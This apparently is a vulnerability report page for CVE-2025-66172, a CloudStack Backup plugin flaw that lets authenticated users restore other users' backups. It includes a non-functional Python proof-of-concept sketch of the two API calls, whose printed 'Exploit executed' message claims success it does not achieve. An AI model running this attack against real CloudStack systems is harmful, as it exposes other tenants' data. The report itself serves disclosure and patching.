Security Vulnerability Report
CVE-2025-66172 CVSS 8.1 HIGH

CVE-2025-66172

Published: 2026-05-08 13:16:36
Last Modified: 2026-05-12 13:30:53

Description

The CloudStack Backup plugin has improper access logic in versions 4.21.0.0 and 4.22.0.0. Anyone with an authenticated user account in a CloudStack 4.21.0.0+ environment where this plugin is enabled, and who has access to specific APIs, can restore a volume from any other user's backups and attach the volume to their own VMs. Backup plugin users on CloudStack 4.21.0.0+ are recommended to upgrade to CloudStack version 4.22.0.1, which fixes this issue.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* - VULNERABLE (versions from 4.21.0.0 up to, but excluding, 4.22.0.1)
Apache CloudStack 4.21.0.0
Apache CloudStack 4.22.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC Concept for CVE-2025-66172
# Requires valid CloudStack API keys
import requests


def exploit_backup_restore(target_api, api_key, secret, victim_backup_id, attacker_vm_id):
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}

    # Step 1: Restore volume from victim's backup
    # Vulnerability: API does not check ownership of victim_backup_id
    restore_params = {
        'command': 'restoreVolumeFromBackup',
        'backupid': victim_backup_id,
        'apiKey': api_key,
        'response': 'json'
    }
    # Signature generation logic omitted for brevity
    print(f"[*] Attempting to restore volume from backup: {victim_backup_id}")
    # r_restore = requests.post(target_api, data=restore_params, headers=headers)
    # restored_volume_id = r_restore.json()['restorevolumefrombackupresponse']['id']

    # Step 2: Attach restored volume to attacker's VM
    # attach_params = {
    #     'command': 'attachVolume',
    #     'id': restored_volume_id,
    #     'virtualmachineid': attacker_vm_id,
    #     'apiKey': api_key,
    #     'response': 'json'
    # }
    # r_attach = requests.post(target_api, data=attach_params, headers=headers)
    print("[+] Exploit executed: Volume restored and attached (if vulnerable)")


# Example usage
# exploit_backup_restore('http://target:8080/client/api', 'attacker_key', 'attacker_secret', 'uuid-of-victim-backup', 'uuid-of-attacker-vm')
```

References

https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm (Mailing List, Third Party Advisory)
http://www.openwall.com/lists/oss-security/2026/05/09/3 (Mailing List, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66172",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T13:16:35.607",
    "lastModified": "2026-05-12T13:30:53.190",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The CloudStack Backup plugin has an improper access logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in CloudStack 4.21.0.0+ environments, where this plugin is enabled and have access to specific APIs can restore a volume from any other user's backups and attach the volume to their own VMs.\n\nBackup plugin users using CloudStack 4.21.0.0+ are recommended to upgrade to CloudStack version 4.22.0.1, which fixes this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-359"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.21.0.0",
                "versionEndExcluding": "4.22.0.1",
                "matchCriteriaId": "78690ED1-C4B3-4DC9-9B53-FB31D6D17125"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm",
        "source": "[email protected]",
        "tags": ["Mailing List", "Third Party Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/05/09/3",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Mailing List", "Third Party Advisory"]
      }
    ]
  }
}
```